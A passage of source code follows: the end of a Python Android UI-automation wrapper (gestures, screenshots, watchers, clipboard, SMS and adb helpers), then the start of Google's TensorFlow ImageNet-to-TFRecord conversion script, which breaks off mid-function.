take screenshot custom
fomart: 'jpeg, png, webp'
quality: compress ratio
'''
return my_self.server.jsonrpc.screenshot_custom(filename, fomart, quality)
def crop(self, left, top, width, height, customWidth, customHeight, filename="screenshot.png", imageFormat="png"):
return my_self.server.jsonrpc.takeScreenshot(left, top, width, height, customWidth, customHeight, filename, imageFormat)
return _ScreenShot()
def freeze_rotation(self, freeze=True):
'''freeze or unfreeze the device rotation in current status.'''
self.server.jsonrpc.freezeRotation(freeze)
@property
def orientation(self):
'''
orienting the devie to left/right or natural.
left/l: rotation=90 , displayRotation=1
right/r: rotation=270, displayRotation=3
natural/n: rotation=0 , displayRotation=0
upsidedown/u: rotation=180, displayRotation=2
'''
return self.__orientation[self.info["displayRotation"]][1]
@orientation.setter
def orientation(self, value):
'''setter of orientation property.'''
for values in self.__orientation:
if value in values:
# can not set upside-down until api level 18.
self.server.jsonrpc.setOrientation(values[1])
break
else:
raise ValueError("Invalid orientation.")
@property
def last_traversed_text(self):
'''get last traversed text. used in webview for highlighted text.'''
return self.server.jsonrpc.getLastTraversedText()
def clear_traversed_text(self):
'''clear the last traversed text.'''
self.server.jsonrpc.clearLastTraversedText()
def set_text(self, content):
'''shell input set test'''
self.adb.shell('input text %s'%content)
@property
def open(self):
'''
Open notification or quick settings.
Usage:
d.open.notification()
d.open.quick_settings()
'''
@param_to_property(action=["notification", "quick_settings"])
def _open(action):
if action == "notification":
return self.server.jsonrpc.openNotification()
elif action == "quick_settings":
return self.server.jsonrpc.openQuickSettings()
elif action == 'recent_apps':
return self.server.jsonrpc.openRecentApps()
return _open
@property
def handlers(self):
obj = self
class Handlers(object):
def on(self, fn):
if fn not in obj.server.handlers['handlers']:
obj.server.handlers['handlers'].append(fn)
obj.server.handlers['device'] = obj
return fn
def off(self, fn):
if fn in obj.server.handlers['handlers']:
obj.server.handlers['handlers'].remove(fn)
return Handlers()
@property
def watchers(self):
obj = self
class Watchers(list):
def __init__(self):
for watcher in obj.server.jsonrpc.getWatchers():
self.append(watcher)
@property
def triggered(self):
return obj.server.jsonrpc.hasAnyWatcherTriggered()
def remove(self, name=None):
if name:
obj.server.jsonrpc.removeWatcher(name)
else:
for name in self:
obj.server.jsonrpc.removeWatcher(name)
def reset(self):
obj.server.jsonrpc.resetWatcherTriggers()
return self
def run(self):
obj.server.jsonrpc.runWatchers()
return self
return Watchers()
def watcher(self, name):
obj = self
class Watcher(object):
def __init__(self):
self.__selectors = []
@property
def triggered(self):
return obj.server.jsonrpc.hasWatcherTriggered(name)
def remove(self):
obj.server.jsonrpc.removeWatcher(name)
def when(self, **kwargs):
self.__selectors.append(Selector(**kwargs))
return self
def click(self, **kwargs):
obj.server.jsonrpc.registerClickUiObjectWatcher(name, self.__selectors, Selector(**kwargs))
@property
def press(self):
@param_to_property(
"home", "back", "left", "right", "up", "down", "center",
"search", "enter", "delete", "del", "recent", "volume_up",
"menu", "volume_down", "volume_mute", "camera", "power")
def _press(*args):
obj.server.jsonrpc.registerPressKeyskWatcher(name, self.__selectors, args)
return _press
return Watcher()
@property
def press(self):
'''
press key via name or key code. Supported key name includes:
home, back, left, right, up, down, center, menu, search, enter,
delete(or del), recent(recent apps), volume_up, volume_down,
volume_mute, camera, power.
Usage:
d.press.back() # press back key
d.press.menu() # press home key
d.press(89) # press keycode
'''
@param_to_property(
key=["home", "back", "left", "right", "up", "down", "center",
"menu", "search", "enter", "delete", "del", "recent",
"volume_up", "volume_down", "volume_mute", "camera", "power"]
)
def _press(key, meta=None, num=1):
if isinstance(key, int):
return self.server.jsonrpc.pressKeyCode(key, meta) if meta else self.server.jsonrpc.pressKeyCode(key)
else:
if key == "back":
return self.back(num)
return self.server.jsonrpc.pressKey(str(key))
return _press
def back(self, num=1):
'''force back'''
def _back():
self.adb.shell("input keyevent 4")
while num>0:
t = threading.Thread(target=_back)
t.setDaemon(True)
t.start()
time.sleep(0.2)
num -= 1
def wakeup(self):
'''turn on screen in case of screen off.'''
self.server.jsonrpc.wakeUp()
def sleep(self):
'''turn off screen in case of screen on.'''
self.server.jsonrpc.sleep()
def start_activity(self, packageActivity):
'''start activity'''
self.adb.start_app(packageActivity)
def wait_time(self, wait_time):
'''wait time relate python sleep'''
time.sleep(wait_time)
@property
def clipboard(self):
devive_self = self
class _Clipboard(object):
def set(self, content, content_type='text'):
return devive_self.server.jsonrpc.setClipboard(content_type, content)
def get(self, content_type="text"):
return devive_self.server.jsonrpc.getClipboard(content_type)
def clear(self):
return devive_self.server.jsonrpc.clearClipboard()
return _Clipboard()
@property
def screen(self):
'''
Turn on/off screen.
Usage:
d.screen.on()
d.screen.off()
d.screen == 'on' # Check if the screen is on, same as 'd.screenOn'
d.screen == 'off' # Check if the screen is off, same as 'not d.screenOn'
'''
devive_self = self
class _Screen(object):
def on(self):
return devive_self.wakeup()
def off(self):
return devive_self.sleep()
def __call__(self, action):
if action == "on":
return self.on()
elif action == "off":
return self.off()
else:
raise AttributeError("Invalid parameter: %s" % action)
def __eq__(self, value):
info = devive_self.info
if "screenOn" not in info:
raise EnvironmentError("Not supported on Android 4.3 and belows.")
if value in ["on", "On", "ON"]:
return info["screenOn"]
elif value in ["off", "Off", "OFF"]:
return not info["screenOn"]
raise ValueError("Invalid parameter. It can only be compared with on/off.")
def __ne__(self, value):
return not self.__eq__(value)
return _Screen()
@property
def wait(self):
'''
Waits for the current application to idle or window update event occurs.
Usage:
d.wait.idle(timeout=1000)
d.wait.update(timeout=1000, package_name="com.android.settings")
'''
@param_to_property(action=["idle", "update"])
def _wait(action, timeout=1000, package_name=None):
if timeout / 1000 + 5 > int(os.environ.get("JSONRPC_TIMEOUT", 90)):
http_timeout = timeout / 1000 + 5
else:
http_timeout = int(os.environ.get("JSONRPC_TIMEOUT", 90))
if action == "idle":
return self.server.jsonrpc_wrap(timeout=http_timeout).waitForIdle(timeout)
elif action == "update":
return self.server.jsonrpc_wrap(timeout=http_timeout).waitForWindowUpdate(package_name, timeout)
return _wait
def exists(self, **kwargs):
'''Check if the specified ui object by kwargs exists.'''
return self(**kwargs).exists
def stop_third_app(self,ignore_filter=["com.tencent.mm"]):
'''停止第三方app'''
self.adb.stop_third_app(ignore_filter)
@property
def configurator(self):
'''
:Args:
actionAcknowledgmentTimeout, default:3000ms
keyInjectionDelay, default:0ms
scrollAcknowledgmentTimeout, default: 200ms
waitForIdleTimeout default: 10000ms
waitForSelectorTimeout default: 10000ms
:Usage:
d.configurator.set()
d.configurator.info()
d.configurator.restore()
'''
device.self = self
class _ConfiguratorInfo(object):
def info(self):
return device.self.server.jsonrpc.getConfigurator()
def set(self, **kwargs):
config_info = {}
for k in kwargs:
config_info[k] = kwargs[k]
return device.self.server.jsonrpc.setConfigurator(config_info)
def restore(self):
return device.self.server.jsonrpc.setConfigurator({'flag':True})
return _ConfiguratorInfo()
@property
def toast(self):
device_self = self
class _Toast(object):
def on(self):
return device_self.server.jsonrpc.toast('on')
def off(self):
return device_self.server.jsonrpc.toast('off')
return _Toast()
@property
def img_tz(self):
device_self = self
class _Img(object):
def exists(self, query, origin=None, interval=2, timeout=4, algorithm='sift', threshold=0.75, colormode=0):
if origin:
try:
pos = ImageUtil.find_image_positon(query, origin, algorithm, threshold,colormode)
if pos:
return True
except:
pass
return False
begin = time.time()
isExists = False
src_img_path = tempfile.mktemp()
device_self.screenshot(src_img_path)
while (time.time() - begin < timeout):
time.sleep(interval)
device_self.screenshot(src_img_path)
try:
pos = ImageUtil.find_image_positon(query, src_img_path, algorithm, threshold, colormode)
if pos:
isExists = True
except:
pass
if not isExists:
time.sleep(interval)
del_file(src_img_path)
continue
del_file(src_img_path)
return isExists
def click(self, query, origin=None, algorithm='sift', threshold=0.75, colormode=0):
pos = self.get_location(query, origin, algorithm, threshold, colormode)
if pos:
device_self.click(pos[0],pos[1])
else:
raise AssertionError("not find sub img on big img")
def get_location(self, query, origin=None, algorithm='sift', threshold=0.75, colormode=0):
src_img_path = origin
if src_img_path is None:
src_img_path = tempfile.mktemp()
device_self.screenshot(src_img_path)
if not os.path.exists(src_img_path):
raise IOError('path not origin img')
try:
pos = ImageUtil.find_image_positon(query, src_img_path, algorithm, threshold, colormode)
return pos
except:
raise
finally:
if origin is None:
del_file(src_img_path)
return _Img()
@property
def img(self):
device_self = self
class _Img(object):
def exists(self, query, origin=None, interval=2, timeout=4, threshold=0.99,colormode=0):
threshold = 1 - threshold
if origin:
return isMatch(query, origin, threshold,colormode)
begin = time.time()
isExists = False
tmp = tempfile.mktemp()
while (time.time() - begin < timeout):
device_self.screenshot(tmp)
isExists = isMatch(query, tmp, threshold,colormode)
if not isExists:
time.sleep(interval)
del_file(tmp)
continue
del_file(tmp)
return isExists
def click(self, query, origin=None, threshold=0.99, rotation=0,colormode=0):
threshold = 1 - threshold
pos = self.get_location(query, origin, threshold, rotation, colormode)
if pos:
device_self.click(pos[0], pos[1])
else:
raise AssertionError("not find sub img on big img")
def get_location(self, query, origin=None, threshold=0.99, rotation=0, colormode=0):
threshold = 1 - threshold
src_img_path = origin
if src_img_path is None:
src_img_path = tempfile.mktemp()
device_self.screenshot(src_img_path)
if not os.path.exists(src_img_path):
raise IOError('path not origin img')
try:
pos = getMatchedCenterOffset(query, src_img_path, threshold, rotation, colormode)
return pos
except:
raise
finally:
if origin is None:
del_file(src_img_path)
return _Img()
@property
def webview(self):
if self.webdriver:
return self.webdriver
self.webdriver = ChromeDriver(self)
return self.webdriver
def quit(self):
self.server.stop()
try:
if self.webdriver:
self.webdriver.quit()
except:
pass
def touchAction(self):
device_self = self
class _TouchAction(object):
def __init__(self):
self._actions = []
self._x = 0
self._y = 0
def down(self,x,y):
self._add_action("touchDown", self._get_optx({'x':x,'y':y}))
return self
def up(self):
self._add_action("touchUp", {'x':self._x,'y':self._y})
return self
def move_to(self,x,y):
self._add_action("moveTo", self._get_optx({'x':x,'y':y}))
return self
def wait(self,ms):
self._add_action("wait", {'s':ms})
return self
def _add_action(self, action, options):
gesture = {
'action': action,
'options': options,
}
self._actions.append(gesture)
def _get_optx(self, opt):
self._x = opt['x']
self._y = opt['y']
return opt
def perform(self):
try:
for action in self._actions:
act = action.get('action')
opt = action.get('options')
if act == "touchDown":
device_self.server.jsonrpc.touchDown(opt['x'],opt['y'])
if act == "moveTo":
device_self.server.jsonrpc.moveTo(opt['x'],opt['y'])
if act == "touchUp":
device_self.server.jsonrpc.touchUp(opt['x'],opt['y'])
if act == "wait":
ms = opt.get("s")
time.sleep(ms)
finally:
self._actions = []
return _TouchAction()
def getPhoneInfo(self, simType=0):
"""获取手机卡相关信息,参数为0,1,主卡,副卡"""
return self.server.jsonrpc.getPhoneInfo(simType)
def default_sms(self, sms_app=None):
"""获取或设置默认短信应该"""
return self.server.jsonrpc.defaultSms(sms_app)
def getSmsInfo(self, num=1):
"""获取短信相关内容"""
return self.server.jsonrpc.getSms(num)
def writeSms(self, address, body, readStatus=0, type=1):
"""写入短信
:param address 1860299678
:param body test
:param readStatus default 0 未读, 1 已读
:param type default 1 收 2 发
"""
return self.server.jsonrpc.writeSms(address, body, readStatus, type)
def jumpAppDetail(self,packageName=None):
"""跳应用详情"""
self.server.jsonrpc.jumpApp(packageName)
def checkPermission(self, permission):
"""检查权限"""
return self.server.jsonrpc.checkPermission(permission)
def open_brower(self,url):
self.adb.shell('am','start', '-a', 'android.intent.action.VIEW', '-d', url)
def remove_app(self, del_list=[]):
"""移除指定app"""
if del_list:
for package_name in del_list:
try:
self.adb.shell('pm', 'uninstall', package_name)
except:
pass
def double_click(self, x, y, ms=0.2):
"""adb 命令行发行双击"""
def tt(x,y):
self.adb.shell("input tap {0} {1}".format(x,y))
threading.Thread(target=tt, args=(x,y)).start()
time.sleep(ms) # 默认间隔200ms
threading.Thread(target=tt, args=(x,y)).start()
@property
def request(self):
device_self = self
class _Request(object):
def get(self, url, data=None, files=None, headers=None):
result = device_self.server.jsonrpc.httpRequest("get", url, headers, data, files)
if result:
return json.loads(result)
def post(self, url, data=None, files=None, headers=None):
result = device_self.server.jsonrpc.httpRequest("post", url, headers, data, files)
if result:
return json.loads(result)
def send_file(self, file_path, filename=None):
if os.path.exists(file_path):
with open(file_path, "rb") as f:
content = base64.b64encode(f.read())
return device_self.server.jsonrpc.sendFile(filename, content)
def get_cookie(self, url):
return device_self.server.jsonrpc.getCookie(url)
def get_html(self, url):
return device_self.server.jsonrpc.getHtml(url)
return _Request()
def get_app_info(self, appname):
"""通过appname获取app相关信息"""
return self.server.jsonrpc.getAppinfo(appname)
def del_file(path):
if os.path.exists(path):
os.remove(path)
Device = AutomatorDevice
class AutomatorDeviceUiObject(object):
'''Represent a UiObject, on which user can perform actions, such as click, set text
'''
__alias = {'description': "contentDescription"}
def __init__(self, device, selector):
self.device = device
self.jsonrpc = device.server.jsonrpc
self.selector = selector
@property
def exists(self):
'''check if the object exists in current window.'''
return self.jsonrpc.exist(self.selector)
def __getattr__(self, attr):
'''alias of fields in info property.'''
info = self.info
if attr in info:
return info[attr]
elif attr in self.__alias:
return info[self.__alias[attr]]
else:
raise AttributeError("%s attribute not found!" % attr)
@property
def info(self):
'''ui object info.'''
return self.jsonrpc.objInfo(self.selector)
@property
def location(self):
'''ui object location.'''
info = self.info
bounds = info.get("visibleBounds") or info.get("bounds")
x = (bounds["left"] + bounds["right"]) / 2
y = (bounds["top"] + bounds["bottom"]) / 2
return x,y
def set_text(self, text):
'''set the text field.'''
if text in [None, ""]:
return self.jsonrpc.clearTextField(self.selector) # TODO no return
else:
return self.jsonrpc.setText(self.selector, text)
def clear_text(self):
'''clear text. alias for set_text(None).'''
self.set_text(None)
@property
def click(self):
'''
click on the ui object.
Usage:
d(text="Clock").click() # click on the center of the ui object
d(text="OK").click.wait(timeout=3000) # click and wait for the new window update
d(text="John").click.topleft() # click on the topleft of the ui object
d(text="John").click.bottomright() # click on the bottomright of the ui object
'''
@param_to_property(action=["tl", "topleft", "br", "bottomright", "wait"])
def _click(action=None, timeout=3000):
if action is None:
return self.jsonrpc.click(self.selector)
elif action in ["tl", "topleft", "br", "bottomright"]:
return self.jsonrpc.click(self.selector, action)
else:
return self.jsonrpc.clickAndWaitForNewWindow(self.selector, timeout)
return _click
def long_press(self, duration=0):
'''long press obj'''
return self.jsonrpc.longClick(self.selector, duration)
@property
def long_click(self):
'''
Perform a long click action on the object.
Usage:
d(text="Image").long_click() # long click on the center of the ui object
d(text="Image").long_click.topleft() # long click on the topleft of the ui object
d(text="Image").long_click.bottomright() # long click on the topleft of the ui object
'''
@param_to_property(corner=["tl", "topleft", "br", "bottomright", "wait"])
def _long_click(corner=None, duration=0):
info = self.info
if info["longClickable"]:
if corner in ["tl", "topleft", "br", "bottomright"]:
return self.jsonrpc.longClick(self.selector, corner)
else:
return self.jsonrpc.longClick(self.selector, duration)
else:
bounds = info.get("visibleBounds") or info.get("bounds")
if corner in ["tl", "topleft"]:
x = (5 * bounds["left"] + bounds["right"]) / 6
y = (5 * bounds["top"] + bounds["bottom"]) / 6
elif corner in ["br", "bottomright"]:
x = (bounds["left"] + 5 * bounds["right"]) / 6
y = (bounds["top"] + 5 * bounds["bottom"]) / 6
else:
x = (bounds["left"] + bounds["right"]) / 2
y = (bounds["top"] + bounds["bottom"]) / 2
return self.device.long_click(x, y, duration)
return _long_click
@property
def drag(self):
'''
Drag the ui object to other point or ui object.
Usage:
d(text="Clock").drag.to(x=100, y=100) # drag to point (x,y)
d(text="Clock").drag.to(text="Remove") # drag to another object
'''
def to(obj, *args, **kwargs):
if len(args) >= 2 or "x" in kwargs or "y" in kwargs:
drag_to = lambda x, y, steps=100: self.jsonrpc.dragTo(self.selector, x, y, steps)
else:
drag_to = lambda steps=100, **kwargs: self.jsonrpc.dragTo(self.selector, Selector(**kwargs), steps)
return drag_to(*args, **kwargs)
return type("Drag", (object,), {"to": to})()
def gesture(self, start1, start2, *args, **kwargs):
'''
perform two point gesture.
Usage:
d().gesture(startPoint1, startPoint2).to(endPoint1, endPoint2, steps)
d().gesture(startPoint1, startPoint2, endPoint1, endPoint2, steps)
'''
def to(obj_self, end1, end2, steps=100):
ctp = lambda pt: point(*pt) if type(pt) == tuple else pt # convert tuple to point
s1, s2, e1, e2 = ctp(start1), ctp(start2), ctp(end1), ctp(end2)
return self.jsonrpc.gesture(self.selector, s1, s2, e1, e2, steps)
obj = type("Gesture", (object,), {"to": to})()
return obj if len(args) == 0 else to(None, *args, **kwargs)
def gestureM(self, start1, start2, start3, *args, **kwargs):
'''
perform 3 point gesture.
Usage:
d().gestureM((100,200),(100,300),(100,400),(100,400),(100,400),(100,400))
d().gestureM((100,200),(100,300),(100,400)).to((100,400),(100,400),(100,400))
'''
def to(obj_self, end1, end2, end3, steps=100):
ctp = lambda pt: point(*pt) if type(pt) == tuple else pt # convert tuple to point
s1, s2, s3, e1, e2, e3 = ctp(start1), ctp(start2), ctp(start3), ctp(end1), ctp(end2), ctp(end3)
return self.jsonrpc.gesture(self.selector, s1, s2, s3, e1, e2, e3, steps)
obj = type("Gesture", (object,), {"to": to})()
return obj if len(args) == 0 else to(None, *args, **kwargs)
@property
def pinch(self):
'''
Perform two point gesture from edge to center(in) or center to edge(out).
Usages:
d().pinch.In(percent=100, steps=10)
d().pinch.Out(percent=100, steps=100)
'''
@param_to_property(in_or_out=["In", "Out"])
def _pinch(in_or_out="Out", percent=100, steps=50):
if in_or_out in ["Out", "out"]:
return self.jsonrpc.pinchOut(self.selector, percent, steps)
elif in_or_out in ["In", "in"]:
return self.jsonrpc.pinchIn(self.selector, percent, steps)
return _pinch
@property
def swipe(self):
'''
Perform swipe action. if device platform greater than API 18, percent can be used and value between 0 and 1
Usages:
d().swipe.right()
d().swipe.left(steps=10)
d().swipe.up(steps=10)
d().swipe.down()
d().swipe("right", steps=20)
d().swipe("right", steps=20, percent=0.5)
'''
@param_to_property(direction=["up", "down", "right", "left"])
def _swipe(direction="left", steps=10, percent=1):
if percent == 1:
return self.jsonrpc.swipe(self.selector, direction, steps)
else:
return self.jsonrpc.swipe(self.selector, direction, percent, steps)
return _swipe
@property
def wait(self):
'''
Wait until the ui object gone or exist.
Usage:
d(text="Clock").wait.gone() # wait until it's gone.
d(text="Settings").wait.exists() # wait until it appears.
'''
@param_to_property(action=["exists", "gone"])
def _wait(action, timeout=3000):
if timeout / 1000 + 5 > int(os.environ.get("JSONRPC_TIMEOUT", 90)):
http_timeout = timeout / 1000 + 5
else:
http_timeout = int(os.environ.get("JSONRPC_TIMEOUT", 90))
method = self.device.server.jsonrpc_wrap(
timeout=http_timeout
).waitUntilGone if action == "gone" else self.device.server.jsonrpc_wrap(timeout=http_timeout).waitForExists
return method(self.selector, timeout)
return _wait
def screenshot(self,filename=None, scale=1.0, quality=100):
'''element screen shot'''
result = self.jsonrpc.screenshot(self.selector, scale, quality)
if filename is None:
filename = tempfile.mktemp()
with open(filename, 'wb') as f:
f.write(result)
return filename
class AutomatorDeviceNamedUiObject(AutomatorDeviceUiObject):
def __init__(self, device, name):
super(AutomatorDeviceNamedUiObject, self).__init__(device, name)
def child(self, **kwargs):
return AutomatorDeviceNamedUiObject(
self.device,
self.jsonrpc.getChild(self.selector, Selector(**kwargs))
)
def sibling(self, **kwargs):
return AutomatorDeviceNamedUiObject(
self.device,
self.jsonrpc.getFromParent(self.selector, Selector(**kwargs))
)
class AutomatorDeviceObject(AutomatorDeviceUiObject):
'''Represent a generic UiObject/UiScrollable/UiCollection,
on which user can perform actions, such as click, set text
'''
def __init__(self, device, selector):
super(AutomatorDeviceObject, self).__init__(device, selector)
def child(self, **kwargs):
'''set childSelector.'''
return AutomatorDeviceObject(
self.device,
self.selector.clone().child(**kwargs)
)
def sibling(self, **kwargs):
'''set fromParent selector.'''
return AutomatorDeviceObject(
self.device,
self.selector.clone().sibling(**kwargs)
)
child_selector, from_parent = child, sibling
def child_by_text(self, txt, **kwargs):
if "allow_scroll_search" in kwargs:
allow_scroll_search = kwargs.pop("allow_scroll_search")
name = self.jsonrpc.childByText(
self.selector,
Selector(**kwargs),
txt,
allow_scroll_search
)
else:
name = self.jsonrpc.childByText(
self.selector,
Selector(**kwargs),
txt
)
return AutomatorDeviceNamedUiObject(self.device, name)
def child_by_description(self, txt, **kwargs):
if "allow_scroll_search" in kwargs:
allow_scroll_search = kwargs.pop("allow_scroll_search")
name = self.jsonrpc.childByDescription(
self.selector,
Selector(**kwargs),
txt,
allow_scroll_search
)
else:
name = self.jsonrpc.childByDescription(
self.selector,
Selector(**kwargs),
txt
)
return AutomatorDeviceNamedUiObject(self.device, name)
def child_by_instance(self, inst, **kwargs):
return AutomatorDeviceNamedUiObject(
self.device,
self.jsonrpc.childByInstance(self.selector, Selector(**kwargs), inst)
)
@property
def count(self):
return self.jsonrpc.count(self.selector)
def __len__(self):
return self.count
def __getitem__(self, index):
count = self.count
if index >= count:
raise IndexError()
elif count == 1:
return self
else:
selector = self.selector.clone()
selector["instance"] = index
return AutomatorDeviceObject(self.device, selector)
def __iter__(self):
obj, length = self, self.count
class Iter(object):
def __init__(self):
self.index = -1
def next(self):
self.index += 1
if self.index < length:
return obj[self.index]
else:
raise StopIteration()
__next__ = next
return Iter()
def right(self, **kwargs):
def onrightof(rect1, rect2):
left, top, right, bottom = intersect(rect1, rect2)
return rect2["left"] - rect1["right"] if top < bottom else -1
return self.__view_beside(onrightof, **kwargs)
def left(self, **kwargs):
def onleftof(rect1, rect2):
left, top, right, bottom = intersect(rect1, rect2)
return rect1["left"] - rect2["right"] if top < bottom else -1
return self.__view_beside(onleftof, **kwargs)
def up(self, **kwargs):
def above(rect1, rect2):
left, top, right, bottom = intersect(rect1, rect2)
return rect1["top"] - rect2["bottom"] if left < right else -1
return self.__view_beside(above, **kwargs)
def down(self, **kwargs):
def under(rect1, rect2):
left, top, right, bottom = intersect(rect1, rect2)
return rect2["top"] - rect1["bottom"] if left < right else -1
return self.__view_beside(under, **kwargs)
def __view_beside(self, onsideof, **kwargs):
bounds = self.info["bounds"]
min_dist, found = -1, None
for ui in AutomatorDeviceObject(self.device, Selector(**kwargs)):
dist = onsideof(bounds, ui.info["bounds"])
if dist >= 0 and (min_dist < 0 or dist < min_dist):
min_dist, found = dist, ui
return found
@property
def fling(self):
'''
Perform fling action.
Usage:
d().fling() # default vertically, forward
d().fling.horiz.forward()
d().fling.vert.backward()
d().fling.toBeginning(max_swipes=100) # vertically
d().fling.horiz.toEnd()
'''
@param_to_property(
dimention=["vert", "vertically", "vertical", "horiz", "horizental", "horizentally"],
action=["forward", "backward", "toBeginning", "toEnd"]
)
def _fling(dimention="vert", action="forward", max_swipes=1000):
vertical = dimention in ["vert", "vertically", "vertical"]
if action == "forward":
return self.jsonrpc.flingForward(self.selector, vertical)
elif action == "backward":
return self.jsonrpc.flingBackward(self.selector, vertical)
elif action == "toBeginning":
return self.jsonrpc.flingToBeginning(self.selector, vertical, max_swipes)
elif action == "toEnd":
return self.jsonrpc.flingToEnd(self.selector, vertical, max_swipes)
return _fling
@property
def scroll(self):
'''
Perfrom scroll action.
Usage:
d().scroll(steps=50) # default vertically and forward
d().scroll.horiz.forward(steps=100)
d().scroll.vert.backward(steps=100)
d().scroll.horiz.toBeginning(steps=100, max_swipes=100)
d().scroll.vert.toEnd(steps=100)
d().scroll.horiz.to(text="Clock")
'''
def __scroll(vertical, forward, steps=100):
method = self.jsonrpc.scrollForward if forward else self.jsonrpc.scrollBackward
return method(self.selector, vertical, steps)
def __scroll_to_beginning(vertical, steps=100, max_swipes=1000):
return self.jsonrpc.scrollToBeginning(self.selector, vertical, max_swipes, steps)
def __scroll_to_end(vertical, steps=100, max_swipes=1000):
return self.jsonrpc.scrollToEnd(self.selector, vertical, max_swipes, steps)
def __scroll_to(vertical, **kwargs):
return self.jsonrpc.scrollTo(self.selector, Selector(**kwargs), vertical)
@param_to_property(
dimention=["vert", "vertically", "vertical", "horiz", "horizental", "horizentally"],
action=["forward", "backward", "toBeginning", "toEnd", "to"])
def _scroll(dimention="vert", action="forward", **kwargs):
vertical = dimention in ["vert", "vertically", "vertical"]
if action in ["forward", "backward"]:
return __scroll(vertical, action == "forward", **kwargs)
elif action == "toBeginning":
return __scroll_to_beginning(vertical, **kwargs)
elif action == "toEnd":
return __scroll_to_end(vertical, **kwargs)
elif action == "to":
return __scroll_to(vertical, **kwargs)
return _scroll
device = AutomatorDevice()
|
build_imagenet_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts ImageNet data to TFRecords file format with Example protos.
The raw ImageNet data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
...
where 'n01440764' is the unique synset label associated with
these images.
The training data set consists of 1000 sub-directories (i.e. labels)
each containing 1200 JPEG images for a total of 1.2M JPEG images.
The evaluation data set consists of 1000 sub-directories (i.e. labels)
each containing 50 JPEG images for a total of 50K JPEG images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of 1024 and 128 TFRecord files, respectively.
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
Each validation TFRecord file contains ~390 records. Each training TFREcord
file contains ~1250 records. Each record within the TFRecord file is a
serialized Example proto. The Example proto contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [1, 1000] where 0 is not used.
image/class/synset: string specifying the unique ID of the label,
e.g. 'n01440764'
image/class/text: string specifying the human-readable version of the label
e.g. 'red fox, Vulpes vulpes'
image/object/bbox/xmin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/xmax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymin: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/ymax: list of integers specifying the 0+ human annotated
bounding boxes
image/object/bbox/label: integer specifying the index in a classification
layer. The label ranges from [1, 1000] where 0 is not used. Note this is
always identical to the image label.
Note that the length of xmin is identical to the length of xmax, ymin and ymax
for each example.
Running this script using 16 threads may take around ~2.5 hours on a HP Z420.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import google3
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 1024,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 128,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 8,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# n01440764
# n01443537
# n01484850
# where each line corresponds to a label expressed as a synset. We map
# each synset contained in the file to an integer (based on the alphabetical
# ordering). See below for details.
tf.app.flags.DEFINE_string('labels_file',
'imagenet_lsvrc_2015_synsets.txt',
'Labels file')
# This file containing mapping from synset to human-readable label.
# Assumes each line of the file looks like:
#
# n02119247 black fox
# n02119359 silver fox
# n02119477 red fox, Vulpes fulva
#
# where each line corresponds to a unique mapping. Note that each line is
# formatted as <synset>\t<human readable label>.
tf.app.flags.DEFINE_string('imagenet_metadata_file',
'imagenet_metadata.txt',
'ImageNet metadata file')
# This file is the output of process_bounding_box.py
# Assumes each line of the file looks like:
#
# n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
#
# where each line corresponds to one bounding box annotation associated
# with an image. Each line can be parsed as:
#
# <JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
#
# Note that there might exist mulitple bounding box annotations associated
# with an image file.
tf.app.flags.DEFINE_string('bounding_box_file',
'./imagenet_2012_bounding_boxes.csv',
'Bounding box file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _float_feature(value):
"""Wrapper for inserting float features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, synset, human, bbox,
height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
synset: string, unique WordNet ID specifying the label, e.g., 'n02323233'
human: string, human-readable label, e.g., 'red fox, Vulpes vulpes'
bbox: list of bounding boxes; each box is a list of integers
specifying [xmin, ymin, xmax, ymax]. All boxes are assumed to belong to
the same label as the image label.
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
xmin = []
ymin = []
xmax = []
ymax = []
for b in bbox:
